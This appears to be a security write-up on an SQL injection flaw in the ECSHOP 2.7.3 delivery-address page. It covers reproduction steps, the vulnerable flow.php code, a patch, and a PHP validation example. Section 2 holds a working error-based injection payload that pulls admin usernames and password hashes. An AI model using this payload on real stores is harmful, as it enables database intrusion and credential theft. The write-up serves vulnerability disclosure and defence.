1. Vulnerability description
The delivery-address page of ECSHOP does not validate the region parameters it receives, so it is vulnerable to SQL injection. An attacker can use a browser plugin such as Firefox Tamper Data to modify the POST data submitted to the delivery-address page, causing unauthorized database operations or even arbitrary code execution.
Relevant Link:
http://sebug.net/vuldb/ssvid-60554
2. Trigger conditions
1. Register an account, add any product to the shopping cart, then fill in the address, telephone number and so on.
2. With a product in the cart, open the delivery-address page; it contains a region selector.
3. http://localhost/ecshop2.7.3/flow.php?step=consignee&direct_shopping=1 (for example, choose Anhui as the province). The POST data is as follows:
   country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=
4. Using Firefox Tamper Data, change province=3 to:
   province=3' ) and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #
5. An error page is then displayed.
Relevant Link:
http://www.2cto.com/Article/201212/179861.html
3. Affected versions
4. Vulnerable code analysis
/flow.php
elseif ($_REQUEST['step'] == 'consignee')
{
    ...
    // The POST data is not effectively filtered
    else
    {
        /* Save consignee information */
        $consignee = array(
            'address_id'    => empty($_POST['address_id'])    ? 0  : intval($_POST['address_id']),
            'consignee'     => empty($_POST['consignee'])     ? '' : trim($_POST['consignee']),
            'country'       => empty($_POST['country'])       ? '' : $_POST['country'],
            'province'      => empty($_POST['province'])      ? '' : $_POST['province'],
            'city'          => empty($_POST['city'])          ? '' : $_POST['city'],
            'district'      => empty($_POST['district'])      ? '' : $_POST['district'],
            'email'         => empty($_POST['email'])         ? '' : $_POST['email'],
            'address'       => empty($_POST['address'])       ? '' : $_POST['address'],
            'zipcode'       => empty($_POST['zipcode'])       ? '' : make_semiangle(trim($_POST['zipcode'])),
            'tel'           => empty($_POST['tel'])           ? '' : make_semiangle(trim($_POST['tel'])),
            'mobile'        => empty($_POST['mobile'])        ? '' : make_semiangle(trim($_POST['mobile'])),
            'sign_building' => empty($_POST['sign_building']) ? '' : $_POST['sign_building'],
            'best_time'     => empty($_POST['best_time'])     ? '' : $_POST['best_time'],
        );
        ...
5. Mitigation
/flow.php
elseif ($_REQUEST['step'] == 'consignee')
{
    ...
    else
    {
        /* Save consignee information */
        $consignee = array(
            /* Filter the user-supplied POST data: region ids are cast to integers, free-text fields are escaped */
            'address_id'    => empty($_POST['address_id'])    ? 0  : intval($_POST['address_id']),
            'consignee'     => empty($_POST['consignee'])     ? '' : compile_str(trim($_POST['consignee'])),
            'country'       => empty($_POST['country'])       ? '' : intval($_POST['country']),
            'province'      => empty($_POST['province'])      ? '' : intval($_POST['province']),
            'city'          => empty($_POST['city'])          ? '' : intval($_POST['city']),
            'district'      => empty($_POST['district'])      ? '' : intval($_POST['district']),
            'email'         => empty($_POST['email'])         ? '' : compile_str($_POST['email']),
            'address'       => empty($_POST['address'])       ? '' : compile_str($_POST['address']),
            'zipcode'       => empty($_POST['zipcode'])       ? '' : compile_str(make_semiangle(trim($_POST['zipcode']))),
            'tel'           => empty($_POST['tel'])           ? '' : compile_str(make_semiangle(trim($_POST['tel']))),
            'mobile'        => empty($_POST['mobile'])        ? '' : compile_str(make_semiangle(trim($_POST['mobile']))),
            'sign_building' => empty($_POST['sign_building']) ? '' : compile_str($_POST['sign_building']),
            'best_time'     => empty($_POST['best_time'])     ? '' : compile_str($_POST['best_time']),
        );
        ...
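Added example, not ECSHOP's own code and not part of the original write-up: it takes the region fields from the POST body shown in section 2, enforces the integer type that the section 5 fix relies on, and then looks the id up with a bound parameter instead of string concatenation. The `region` table, its rows, the in-memory SQLite database and the function names are assumptions constructed for this demo; ECSHOP's real schema and its `$db` wrapper are not used.

```php
<?php
// Added example (not ECSHOP code): strict validation of consignee region ids
// plus a parameterized lookup. The schema below is a constructed stand-in.
declare(strict_types=1);

/**
 * Return the four region-id fields as integers, or throw if any of them is
 * not a plain unsigned decimal string. This is the check the original
 * flow.php omitted: the raw POST value went straight into the SQL text.
 */
function validate_region_ids(array $post): array
{
    $ids = [];
    foreach (['country', 'province', 'city', 'district'] as $field) {
        $value = $post[$field] ?? '';
        // Accept only digits; anything else (quotes, parentheses, SQL keywords) is rejected.
        if (!is_string($value) || !preg_match('/^\d{1,10}$/', $value)) {
            throw new InvalidArgumentException("invalid value for $field");
        }
        $ids[$field] = (int) $value;
    }
    return $ids;
}

/** Look up a region name with a bound integer parameter; the id never touches the SQL string. */
function region_name(PDO $db, int $regionId): ?string
{
    $stmt = $db->prepare('SELECT region_name FROM region WHERE region_id = :id');
    $stmt->bindValue(':id', $regionId, PDO::PARAM_INT);
    $stmt->execute();
    $name = $stmt->fetchColumn();
    return $name === false ? null : $name;
}

// Constructed sample data standing in for ECSHOP's region table (assumption).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE region (region_id INTEGER PRIMARY KEY, region_name TEXT)');
$db->exec("INSERT INTO region VALUES (1, 'China'), (3, 'Anhui'), (37, 'Hefei'), (409, 'Luyang')");

// The region fields of the legitimate POST body from section 2.
$legit = ['country' => '1', 'province' => '3', 'city' => '37', 'district' => '409'];

// A tampered copy: province carries an SQL fragment instead of an id (constructed, abbreviated).
$tampered = $legit;
$tampered['province'] = "3' ) and 1=1 #";

$ids = validate_region_ids($legit);
echo 'province ' . $ids['province'] . ' resolves to ' . region_name($db, $ids['province']) . PHP_EOL;

try {
    validate_region_ids($tampered);
} catch (InvalidArgumentException $e) {
    // Log this: a non-numeric region id on this form is tampering, not a user typo.
    echo 'rejected: ' . $e->getMessage() . PHP_EOL;
}
```

Run it with `php example.php` (the pdo_sqlite extension must be enabled). The difference from the page's fix is worth noting: `intval("3' ) and 1=1 #")` silently evaluates to 3, which neutralizes the injection but leaves no trace of the attempt, whereas rejecting non-numeric input outright and logging the rejection turns the same tampering into an event a monitoring team can alert on.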
6. Offense and defense considerations
Copyright (c) 2015 LittleHann All rights reserved
ecshop /flow.php SQL Injection Vul